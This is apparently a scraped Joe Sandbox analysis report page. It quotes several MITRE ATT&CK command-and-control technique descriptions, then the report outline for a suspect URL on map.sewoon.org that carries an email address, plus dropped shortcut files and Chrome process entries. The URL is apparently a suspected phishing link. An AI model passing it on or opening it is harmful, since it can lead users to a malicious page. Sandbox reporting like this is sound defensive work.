Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5284, Parent PID: 5316

General

Chronological Activities

Analysis Process: chrome.exePID: 6536, Parent PID: 5284

General

Chronological Activities

Windows Analysis Report
https://map.sewoon.org/1/themes/es/?cid=alpanesgmj@madrid.es